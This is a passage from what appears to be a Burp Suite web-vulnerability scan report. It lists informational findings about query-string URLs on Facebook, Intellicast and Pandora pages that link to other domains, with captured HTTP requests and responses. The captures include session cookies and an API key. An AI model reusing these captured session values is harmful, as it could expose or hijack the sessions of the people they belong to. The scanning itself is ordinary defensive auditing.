Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; __utmc=160559081; __utmb=160559081.1.10.1294536631

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:30:24 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 554

<html>

   <head>
       <script type="text/javascript" src="http://static.e00.peanutlabs.com/js/pl-jquery-1.3.2.min.js"></script>
       <script type="text/javascript" src="http://static.e00.peanutlabs.com/js/co
...[SNIP]...

       <script type="text/javascript" src="https://amch.questionmarket.com/dt/s/25387/0.php"></script>
...[SNIP]...

16.39. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/?ref=sgm

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yU/r/UTppMFAy1jk.css
http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/yY/r/co4AWnGwTUM.css
http://e.static.ak.fbcdn.net/rsrc.php/ys/r/Fheu4ksYYAS.css
http://f.static.ak.fbcdn.net/rsrc.php/yT/r/s_GTIq-3cSk.css
http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=KEXAT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dsgm; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dsgm; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 01:43:43 GMT
Content-Length: 30059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yT/r/s_GTIq-3cSk.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yY/r/co4AWnGwTUM.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/ys/r/Fheu4ksYYAS.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yU/r/UTppMFAy1jk.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<span id="async_status" class="async_status" style="display: none"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="recaptcha_loading">Loading... <img class="captcha_loading img" src="http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" style="height:11px;width:16px;" /></div>
...[SNIP]...
<span id="captcha_async_status" class="async_status" style="display: none"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="progress_wrap"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /><div id="progress_msg">
...[SNIP]...

16.40. http://www.facebook.com/Pogo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Pogo

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/Pogo?pageSection=free_home_news

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yU/r/UTppMFAy1jk.css
http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/yY/r/co4AWnGwTUM.css
http://f.static.ak.fbcdn.net/rsrc.php/yT/r/s_GTIq-3cSk.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

GET /Pogo?pageSection=free_home_news HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=TzT-v; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:19:27 GMT
Content-Length: 30000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yY/r/co4AWnGwTUM.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yT/r/s_GTIq-3cSk.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yU/r/UTppMFAy1jk.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js"></script>

<link rel="alternate" type="application/rss+xml" title="Pogo.com" href="/feeds/page.php?format=atom10&id=23050200525"/>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

16.41. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?site=pogo.com&width=310&height=166&header=false&colorscheme=light&font=verdana&recommendations=false

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js
http://b.static.ak.fbcdn.net/rsrc.php/yp/r/M99q1e7g2SY.css
http://static.ak.fbcdn.net/rsrc.php/y-/r/40PDtAkbl8D.css
http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png

Request

Response

16.42. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/facepile.php?api_key=8e6a1a98056aa9ca18b3ce59e4ec2fb4&channel=https%3A%2F%2Fs-static.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3858a0494%26origin%3Dhttps%253A%252F%252Fwww.pogo.com%252Ff11e9b1994%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=1&sdk=joey&width=300

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js
http://b.static.ak.fbcdn.net/rsrc.php/yp/r/M99q1e7g2SY.css
http://static.ak.fbcdn.net/rsrc.php/y-/r/40PDtAkbl8D.css
http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://static.ak.fbcdn.net/rsrc.php/yV/r/P0d2GjyO592.css

Request

GET /plugins/facepile.php?api_key=8e6a1a98056aa9ca18b3ce59e4ec2fb4&channel=https%3A%2F%2Fs-static.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3858a0494%26origin%3Dhttps%253A%252F%252Fwww.pogo.com%252Ff11e9b1994%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=1&sdk=joey&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS

Response

16.43. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fzync&layout=standard&show_faces=false&width=200&action=like&colorscheme=light&height=40

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/y2/r/Ssvmte2lxo0.css
http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

GET /plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fzync&layout=standard&show_faces=false&width=200&action=like&colorscheme=light&height=40 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/?ext_reg=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS

Response

16.44. http://www.intellicast.com/Local/Weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/Local/Weather.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.intellicast.com/Local/Weather.aspx?location=USMI0020

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=10;!c=ic;pos=wx_mid300;sz=300x250;u=nl;ord=6874975001680281600?
http://ad.doubleclick.net/ad/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=15;!c=ic;pos=wx_hdn;sz=1x1;u=nl;ord=6874975001680281600?
http://ad.doubleclick.net/ad/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=1;!c=ic;pos=wx_pc;sz=1x1;u=nl;ord=6874975001680281600?
http://ad.doubleclick.net/ad/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=5;!c=ic;pos=wx_300var;dcopt=ist;sz=300x250,300x600;u=nl;ord=6874975001680281600?
http://ad.doubleclick.net/jumpic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=10;!c=ic;pos=wx_mid300;sz=300x250;u=ord-6874975001680281600?
http://ad.doubleclick.net/jumpic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=15;!c=ic;pos=wx_hdn;sz=1x1;u=ord-6874975001680281600?
http://ad.doubleclick.net/jumpic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=1;!c=ic;pos=wx_pc;sz=1x1;u=ord-6874975001680281600?
http://ad.doubleclick.net/jumpic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=5;!c=ic;pos=wx_300var;dcopt=ist;sz=300x250,300x600;u=ord-6874975001680281600?
http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js
http://b.imwx.com/b/impression?pos=wx_300var&cat=fcst&dcopt=ist&preempt=y&adnet=y&site=ic.us.wx&zone=fcst&dma=513&adid=nl&adsize=300/0&creativeid=nl&tile=5&sz=300x0&!c=ic&ord=6874975001680281600
http://b.imwx.com/b/impression?pos=wx_hdn&cat=fcst&preempt=y&adnet=y&site=ic.us.wx&zone=fcst&dma=513&adid=nl&adsize=1/1&creativeid=nl&tile=15&sz=1x1&!c=ic&ord=6874975001680281600
http://b.imwx.com/b/impression?pos=wx_mid300&cat=fcst&preempt=y&adnet=y&site=ic.us.wx&zone=fcst&dma=513&adid=nl&adsize=300/250&creativeid=nl&tile=10&sz=300x250&!c=ic&ord=6874975001680281600
http://b.imwx.com/b/impression?pos=wx_pc&cat=fcst&preempt=y&adnet=y&site=ic.us.wx&zone=fcst&dma=513&adid=nl&adsize=1/1&creativeid=nl&tile=1&sz=1x1&!c=ic&ord=6874975001680281600
http://itunes.apple.com/app/intellicast-hd/id408451987?mt=8
http://www.aolnews.com/
http://www.aolnews.com/2010/12/28/gingerbread-houses-recalled-in-22-states/?synd=1
http://www.aolnews.com/category/nation/
http://www.aolnews.com/tag/wikileaks/?synd=1
http://www.dailyfinance.com/story/gasoline-3-by-christmas-worse-in-spring/19750651/?synd=1
http://www.fanhouse.com/tag/2010+BCS+Rankings/?synd=1
http://www.walletpop.com/blog/2010/12/07/the-deal-on-tax-cuts-what-it-means-for-you/?synd=1
http://www.wsi.com/aviation
http://www.wsi.com/energy
http://www.wsi.com/media

Request

GET /Local/Weather.aspx?location=USMI0020 HTTP/1.1
Host: www.intellicast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:44:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bcibx1vvfqnepo45jycz0euv; path=/; HttpOnly
Set-Cookie: CityId=USMI0020; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: RecentLocations=Alma, Michigan@USMI0020:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: Pop=0; path=/
Set-Cookie: vw=1; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 90725
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:10:47 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1"><title>
In
...[SNIP]...
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
<div style="padding-top:6px;"><a href="http://www.aolnews.com/category/nation/" target="_blank" onclick="javascript:linkTracker._trackPageview('/AOL/Header/www.aolnews.com/category/nation/');"><span>
...[SNIP]...
<div style="border:solid 1px #AAA;padding:1px;margin-bottom:10px;height:44px;"><a href="http://itunes.apple.com/app/intellicast-hd/id408451987?mt=8" target="_blank"><img src="http://www.intellicast.com/App_Images/ipad/ipad_ad_weather1.jpg" alt="iPad" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jumpic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=1;!c=ic;pos=wx_pc;sz=1x1;u=ord-6874975001680281600?" target="_blank"><img src="http://ad.doubleclick.net/ad/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=1;!c=ic;pos=wx_pc;sz=1x1;u=nl;ord=6874975001680281600?" width="1" height="1" border="0" alt=""></a><img src="http://b.imwx.com/b/impression?pos=wx_pc&cat=fcst&preempt=y&adnet=y&site=ic.us.wx&zone=fcst&dma=513&adid=nl&adsize=1/1&creativeid=nl&tile=1&sz=1x1&!c=ic&ord=6874975001680281600" border="0" height="0" width="0"></noscript>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jumpic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=5;!c=ic;pos=wx_300var;dcopt=ist;sz=300x250,300x600;u=ord-6874975001680281600?" target="_blank"><img src="http://ad.doubleclick.net/ad/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=5;!c=ic;pos=wx_300var;dcopt=ist;sz=300x250,300x600;u=nl;ord=6874975001680281600?" width="300" border="0" alt=""></a><img src="http://b.imwx.com/b/impression?pos=wx_300var&cat=fcst&dcopt=ist&preempt=y&adnet=y&site=ic.us.wx&zone=fcst&dma=513&adid=nl&adsize=300/0&creativeid=nl&tile=5&sz=300x0&!c=ic&ord=6874975001680281600" border="0" height="0" width="0"></noscript>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jumpic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=10;!c=ic;pos=wx_mid300;sz=300x250;u=ord-6874975001680281600?" target="_blank"><img src="http://ad.doubleclick.net/ad/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=10;!c=ic;pos=wx_mid300;sz=300x250;u=nl;ord=6874975001680281600?" width="300" height="250" border="0" alt=""></a><img src="http://b.imwx.com/b/impression?pos=wx_mid300&cat=fcst&preempt=y&adnet=y&site=ic.us.wx&zone=fcst&dma=513&adid=nl&adsize=300/250&creativeid=nl&tile=10&sz=300x250&!c=ic&ord=6874975001680281600" border="0" height="0" width="0"></noscript>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jumpic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=15;!c=ic;pos=wx_hdn;sz=1x1;u=ord-6874975001680281600?" target="_blank"><img src="http://ad.doubleclick.net/ad/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=15;!c=ic;pos=wx_hdn;sz=1x1;u=nl;ord=6874975001680281600?" width="1" height="1" border="0" alt=""></a><img src="http://b.imwx.com/b/impression?pos=wx_hdn&cat=fcst&preempt=y&adnet=y&site=ic.us.wx&zone=fcst&dma=513&adid=nl&adsize=1/1&creativeid=nl&tile=15&sz=1x1&!c=ic&ord=6874975001680281600" border="0" height="0" width="0"></noscript>
...[SNIP]...
<img src="http://images.intellicast.com/App_Images/blue_square.gif" alt="" style="margin-right:5px;" /><a class="Bold" href="http://www.aolnews.com/2010/12/28/gingerbread-houses-recalled-in-22-states/?synd=1" target="new" onclick="javascript:linkTracker._trackPageview('/AOL/RSS/www.aolnews.com/2010/12/28/gingerbread-houses-recalled-in-22-states/?synd=1');" style="margin-right:25px;">Gingerbread Recall</a>
...[SNIP]...
<img src="http://images.intellicast.com/App_Images/blue_square.gif" alt="" style="margin-right:5px;" /><a class="Bold" href="http://www.dailyfinance.com/story/gasoline-3-by-christmas-worse-in-spring/19750651/?synd=1" target="new" onclick="javascript:linkTracker._trackPageview('/AOL/RSS/www.dailyfinance.com/story/gasoline-3-by-christmas-worse-in-spring/19750651/?synd=1');" style="margin-right:25px;">Gas Prices</a>
...[SNIP]...
<img src="http://images.intellicast.com/App_Images/blue_square.gif" alt="" style="margin-right:5px;" /><a class="Bold" href="http://www.fanhouse.com/tag/2010+BCS+Rankings/?synd=1" target="new" onclick="javascript:linkTracker._trackPageview('/AOL/RSS/www.fanhouse.com/tag/2010+BCS+Rankings/?synd=1');" style="margin-right:25px;">BCS Rankings</a>
...[SNIP]...
<img src="http://images.intellicast.com/App_Images/blue_square.gif" alt="" style="margin-right:5px;" /><a class="Bold" href="http://www.walletpop.com/blog/2010/12/07/the-deal-on-tax-cuts-what-it-means-for-you/?synd=1" target="new" onclick="javascript:linkTracker._trackPageview('/AOL/RSS/www.walletpop.com/blog/2010/12/07/the-deal-on-tax-cuts-what-it-means-for-you/?synd=1');" style="margin-right:25px;">Income Tax Cuts</a>
...[SNIP]...
<img src="http://images.intellicast.com/App_Images/blue_square.gif" alt="" style="margin-right:5px;" /><a class="Bold" href="http://www.aolnews.com/tag/wikileaks/?synd=1" target="new" onclick="javascript:linkTracker._trackPageview('/AOL/RSS/www.aolnews.com/tag/wikileaks/?synd=1');" style="margin-right:25px;">Wikileaks</a>
...[SNIP]...
</a> | <a href="http://www.aolnews.com/" target="_blank">News</a></div>
<div id="wsiNav">Professional Weather Solutions: <a href="http://www.wsi.com/aviation">Aviation</a> | <a href="http://www.wsi.com/energy">Energy</a> | <a href="http://www.wsi.com/media">Media</a>
...[SNIP]...

16.45. http://www.pandora.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.pandora.com/?ext_reg=1

The response contains the following links to other domains:

http://ads.pointroll.com/PortalServe/?pid=1166800C77720101223171201&pos=c&r=[RANDOM]
http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://newton.newtonsoftware.com/career/CareerHome.action?clientId=4028f88b276ac19301276e38e49b048e
http://pagead2.googlesyndication.com/pagead/show_companion_ad.js
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-104040h&cg=0&cc=1&ts=noscript
http://secure.quantserve.com/pixel/p-ccK3FeAja-fUQ.gif
http://secure.quantserve.com/quant.js
http://stat.onestat.com/stat.aspx?tagver=2&sid=246941&js=No&
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fzync&layout=standard&show_faces=false&width=200&action=like&colorscheme=light&height=40
http://www.facebook.com/sitetour/connect.php
http://www.onestat.com/
http://www.quantcast.com/p-ccK3FeAja-fUQ

Request

GET /?ext_reg=1 HTTP/1.1
Host: www.pandora.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.5.10.1294536123

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:17 GMT
Content-Type: text/html;charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: tc=;Path=/;Domain=.pandora.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: v2pub=;Path=/;Domain=.pandora.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ccst=;Path=/;Domain=.pandora.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 42216


<html>

<script src="/static/contentDirector.js"></script>

<head>
   <title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>

   <meta name="description" content=
...[SNIP]...
<span>
               <a target="_blank" class="fb_learn_more" href="http://www.facebook.com/sitetour/connect.php">Learn More</a>
...[SNIP]...
<noscript>
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
       codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"
       WIDTH="640"
       HEIGHT="630"
       id="radio">
   <PARAM NAME=movie VALUE="https://www.pandora.com:443/radio/tuner_9_2_0_0_pandora.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...
</a>
             |  
           <a href="http://newton.newtonsoftware.com/career/CareerHome.action?clientId=4028f88b276ac19301276e38e49b048e" target="pandoraContent">jobs</a>
...[SNIP]...
<div id="fbLikeContainer" nowrap="true" style="width: 200px; height: 40px; overflow-x: hidden; visibility: hidden; position: absolute; top: 320px; left: 337px;">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fzync&layout=standard&show_faces=false&width=200&action=like&colorscheme=light&height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:200px; height:40px;" allowTransparency="true"></iframe>
...[SNIP]...
<div id="skinSponsorImage">
<a href="http://ads.pointroll.com/PortalServe/?pid=1166800C77720101223171201&pos=c&r=[RANDOM]" target="_blank"><img src="http://www.pandora.com/static/ads/sponsoredComplimentary/transparent-logo-area.gif" width="300" height="400" border="0" />
...[SNIP]...
</script>

<script language="Javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js">
</script>
...[SNIP]...
<noscript>
<a href="http://www.onestat.com"><img border="0" width="1" height="1" src="http://stat.onestat.com/stat.aspx?tagver=2&sid=246941&js=No&" ALT="OneStat.com Web Analytics"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-ccK3FeAja-fUQ" target="_blank"><img src="//secure.quantserve.com/pixel/p-ccK3FeAja-fUQ.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-104040h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...

16.46. http://www.pandora.com/login.vm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/login.vm

Issue detail

The page was loaded from a URL containing a query string:

http://www.pandora.com/login.vm?target=%2Fbackstage

The response contains the following links to other domains:

http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://newton.newtonsoftware.com/career/CareerHome.action?clientId=4028f88b276ac19301276e38e49b048e
http://s1.srtk.net/www/delivery/ti.php?bannerid=167&trackerid=435&cb=612485
